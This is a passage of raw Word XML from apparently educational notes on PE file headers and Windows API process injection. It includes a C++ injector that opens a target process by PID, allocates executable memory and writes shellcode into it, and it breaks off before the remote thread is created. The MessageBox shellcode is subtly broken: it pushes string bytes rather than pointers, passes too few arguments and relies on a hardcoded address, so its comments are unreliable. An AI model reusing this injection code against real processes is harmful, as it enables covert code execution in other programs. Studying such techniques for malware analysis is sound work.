          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Image Optional Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FE7815" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Data Dictionaries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> are part of the image optional header. They point to the image data directory structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0451B8E4" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Section Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE58BE">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines the available sections and information in the image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> “when file loaded in memory it called image”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2EAEA9" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00D70E75" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70E75">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sections store the contents</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70E75">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the file, such as code, imports, and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF6D32" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3D1545" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275A6D">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7513FFF4" wp14:editId="1B4F2755">
            <wp:extent cx="4321629" cy="2560657"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="106192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6529" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4337335" cy="2569963"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7565C683" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00DE58BE" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7D969C" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Too see all of these info about a file: sue program </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7368F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>“Detect It Easy”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5907C4CC" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A15B60E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00F315FF" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F315FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interacting with Windows internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF5F8CC" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Interaction by </w:t>
      </w:r>
      <w:r w:rsidRPr="00F315FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows API calls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F315FF">
        <w:t>that provides native functionality to interact with the Windows operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70568F69" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00270376" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00270376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00270376">
        <w:t xml:space="preserve">API contains the </w:t>
      </w:r>
      <w:r w:rsidRPr="00270376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Win32 API and</w:t>
      </w:r>
      <w:r w:rsidRPr="00270376">
        <w:t xml:space="preserve">, less commonly, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00270376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Win64 API</w:t>
      </w:r>
      <w:r w:rsidRPr="00270376">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C89F2A" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="028ED704" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Some </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows API Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB763E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">OpenProcess: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Opens the target process so we can access it (read, write, create threads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53EE6F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualAllocEx: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Allocates memory inside the target process (like creating a new buffer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EEF4DD" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">WriteProcessMemory: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Writes your payload (shellcode or data) into the memory you allocated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A348246" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">CreateRemoteThread: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Starts a thread in the target process that runs your injected code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7695EB" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">CloseHandle: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Closes handles (for the process and thread) when you’re done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F620DB8" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Example of using APIs to Inject a payload into a process </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB53245" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Inject a payload into a process (like Notepad) that pops up a MessageBox saying "Hello from Injected Code!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75566684" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The program uses the Windows API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7D3E9" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Compile it using Visual Studio or g++ with Windows SDK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57795228" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>must know the PID (Process ID) of the target (like Notepad). You can get it from Task Manager or code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6451B16E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10B8C">
        <w:rPr>
          <w:rStyle w:val="Heading5Char"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D10AE31"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include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7507C"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include &lt;iostream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D79835"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MessageBox payload (shellcode) that shows a message box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F7307F"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This is hardcoded machine code that calls MessageBoxA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C7319"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You can generate this with tools like msfvenom, or manually in assembly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA83C67"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unsigned char payload[] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D222FB6"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0x6A, 0x00,                         // push 0 (MB_OK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D08F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0x68, 0x41, 0x42, 0x43, 0x44,       // push "DCBA" (fake title placeholder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EFB1A"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0x68, 0x48, 0x65, 0x6C, 0x6C,       // push "lleH" (Hello reversed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213CD9D"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0xB8, 0xAD, 0x23, 0x86, 0x7C,       // mov eax, &lt;MessageBoxA address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3F094"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0xFF, 0xD0,                         // call eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F130DC"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0xC3                                // ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EC52A0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A6A6A"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int main(int argc, char* argv[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D413760"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if (argc &lt; 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F65A08"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out &lt;&lt; "Usage: injector.exe &lt;PID&gt;" &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE8BE00"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return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDB85B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782630E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DWORD pid = atoi(argv[1]); // Convert string to process ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C300B4D" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A2E7818"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 1️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open target process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C1F295"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HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32840B0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if (!hProcess) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA70D24"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err &lt;&lt; "Failed to open process. Error: " &lt;&lt; GetLastError() &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AFE78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return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C51405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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F1D55"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out &lt;&lt; "[+] Opened process with PID " &lt;&lt; pid &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B50EC8" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550504B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 2️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allocate memory in the target process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93D10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LPVOID remoteBuffer = VirtualAllocEx(hProcess, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7CC5F"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if (!remoteBuffer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F81A86"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err &lt;&lt; "Failed to allocate memory. Error: " &lt;&lt; GetLastError() &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E617D"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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118EFE4F"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return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BEE6F4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AEF8B4"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out &lt;&lt; "[+] Allocated memory at " &lt;&lt; remoteBuffer &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E87F7F9" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C8217C" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1140B233"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 3️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8217C">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write the payload into the allocated memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A00FE7A"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IZE_T bytesWritten;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F981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if (!WriteProcessMemory(hProcess, remoteBuffer, payload, sizeof(payload), &amp;bytesWritten)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB6BE0"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err &lt;&lt; "Failed to write to memory. Error: " &lt;&lt; GetLastError() &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199633F7"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VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32543810"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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F79387"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return 1;</w:t>
